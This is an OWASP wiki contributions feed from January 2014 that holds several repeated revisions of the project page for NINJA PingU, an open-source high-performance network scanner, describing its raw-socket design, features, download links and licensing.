   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166169</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166169"/>
				<updated>2014-01-21T11:03:11Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;gt;&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;gt;&lt;br /&gt;
[[Image:NINJA_PingU_Performance.jpg||550px|link=http://owasp.github.io/NINJA-PingU/images/ninjapinguplot.png]]&amp;lt;/dib&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous chart corresponds to a 17 seconds analysis in a 100mbps network, where 10 million hosts were scanned and 9 thousand services identified. The analysis average speed was higher than half million hosts scanned per second.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:NINJA-PinguV1.0.tar.gz&amp;diff=166168</id>
		<title>File:NINJA-PinguV1.0.tar.gz</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:NINJA-PinguV1.0.tar.gz&amp;diff=166168"/>
				<updated>2014-01-21T10:56:40Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: NINJA-Pingu v1.0&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;NINJA-Pingu v1.0&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166161</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166161"/>
				<updated>2014-01-21T09:58:15Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Performance.jpg||550px|link=http://owasp.github.io/NINJA-PingU/images/ninjapinguplot.png]]&lt;br /&gt;
&lt;br /&gt;
The previous chart corresponds to a 17 seconds analysis in a 100mbps network, where 10 million hosts were scanned and 9 thousand services identified. The analysis average speed was higher than half million hosts scanned per second.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:NINJA_PingU_DownaloadV1.jpg&amp;diff=166160</id>
		<title>File:NINJA PingU DownaloadV1.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:NINJA_PingU_DownaloadV1.jpg&amp;diff=166160"/>
				<updated>2014-01-21T09:53:46Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166159</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166159"/>
				<updated>2014-01-21T09:52:22Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Performance.jpg||550px|link=http://owasp.github.io/NINJA-PingU/images/ninjapinguplot.png]]&lt;br /&gt;
&lt;br /&gt;
The previous chart corresponds to a 17 seconds analysis in a 100mbps network, where 10 million hosts were scanned and 9 thousand services identified. The analysis average speed was higher than half million hosts scanned per second.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Image:NINJA_PingU_DownaloadV1.jpg||550px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ NINJA PingU]&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Projects/OWASP_NINJA_PingU_Project/Roadmap&amp;diff=166117</id>
		<title>Projects/OWASP NINJA PingU Project/Roadmap</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Projects/OWASP_NINJA_PingU_Project/Roadmap&amp;diff=166117"/>
				<updated>2014-01-20T17:49:55Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The first beta version has been released.&lt;br /&gt;
&lt;br /&gt;
The features for future versions involve porting it to other operating systems and creating a UI.&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166116</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166116"/>
				<updated>2014-01-20T17:48:56Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
